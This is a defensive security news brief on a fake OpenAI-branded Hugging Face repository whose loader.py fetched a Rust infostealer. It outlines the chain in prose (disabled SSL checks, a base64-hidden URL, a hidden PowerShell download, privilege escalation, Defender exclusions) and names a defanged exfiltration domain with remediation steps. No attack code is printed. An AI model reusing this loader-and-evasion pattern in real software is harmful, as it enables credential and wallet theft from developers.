Fake OpenAI Repository on Hugging Face Pushes Infostealer Malware

What happened

A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter project reached the platform’s trending list and accumulated 244,000 downloads before being removed following reports from HiddenLayer researchers. The repository, named Open-OSS/privacy-filter, briefly reached the number one spot on Hugging Face’s trending page. The download count and the 667 accounts that liked the repository are assessed as likely artificially inflated through automation.

The repository copied OpenAI’s legitimate Privacy Filter model card nearly verbatim and included a loader.py file that appeared to contain legitimate AI-related code. In the background, the script disabled SSL verification, decoded a base64-encoded URL pointing to an external resource, and fetched and executed a JSON payload containing a PowerShell command in an invisible window. That command downloaded a batch file named start.bat that performed privilege escalation, downloaded the final payload called sefirah, added it to Microsoft Defender’s exclusions, and executed it.

The final payload is a Rust-based infostealer targeting browser data from Chromium and Gecko-based browsers including cookies, saved passwords, encryption keys, session tokens, and browsing data; Discord tokens and local databases; cryptocurrency wallets and browser extensions; SSH, FTP, and VPN credentials and configuration files; sensitive local files and wallet seeds; system information; and multi-monitor screenshots. All stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware includes extensive anti-analysis capabilities including checks for virtual machines, sandboxes, debuggers, and analysis tools. HiddenLayer also identified overlapping infrastructure with other malicious repositories and connections to an npm typosquatting campaign distributing the WinOS 4.0 implant.

Who is affected

AI and machine learning developers, researchers, and data scientists who downloaded files from the Open-OSS/privacy-filter repository on or before May 7, 2026 are directly at risk. Given the breadth of data targeted including browser sessions, cryptocurrency wallets, VPN configurations, and SSH keys, any environment where the loader.py script was executed should be treated as fully compromised.

Why CISOs should care

A malicious repository reaching the number one trending position on Hugging Face with 244,000 downloads illustrates how effectively threat actors can exploit trust signals on AI development platforms. Developers who apply healthy skepticism to unknown npm packages or PyPI libraries may apply less scrutiny to a top-trending Hugging Face repository impersonating a recognized AI organization. The combination of a convincing model card, legitimate-looking code, and trending status creates a social proof mechanism that bypasses typical red flags.

The connection to the WinOS 4.0 implant campaign and the shared malicious loader infrastructure indicates this is not an isolated incident but part of a broader campaign targeting the AI development ecosystem specifically.

3 practical actions

1. Reimage machines and rotate all credentials immediately if the malicious repository was downloaded: HiddenLayer’s specific guidance is to reimage affected machines, rotate all stored credentials, replace cryptocurrency wallets and seed phrases, and invalidate all browser sessions and tokens. The Rust-based infostealer’s scope makes partial remediation inadequate.
2. Block recargapopular[.]com at the network perimeter and hunt for existing connections in logs: The C2 domain is the confirmed exfiltration endpoint. Add it to DNS blocklists immediately and review network logs for any outbound connections to this domain from developer workstations and build environments.
3. Implement Hugging Face repository vetting policies for AI development teams: Establish organizational guidelines requiring verification of repository publisher identity, review of model cards against official sources, and security review of any Python scripts before execution, particularly those that make external network calls or disable SSL verification, regardless of a repository’s apparent popularity or trending status.

Also in the news today:

• ShinyHunters Defaces Canvas Login Portals at 330 Schools in Escalating Extortion Campaign
• JDownloader Website Hacked to Replace Installers With Python RAT Malware
• German Police Shut Down Crimenetwork Reboot, Arrest Administrator in Spain
• Attackers Abuse Google Ads and Claude.ai Shared Chats to Push Mac Malware
• GM to Pay $12.75 Million in California Privacy Settlement Over Driver Data Sales
• Škoda Online Shop Security Incident Exposes Customer Data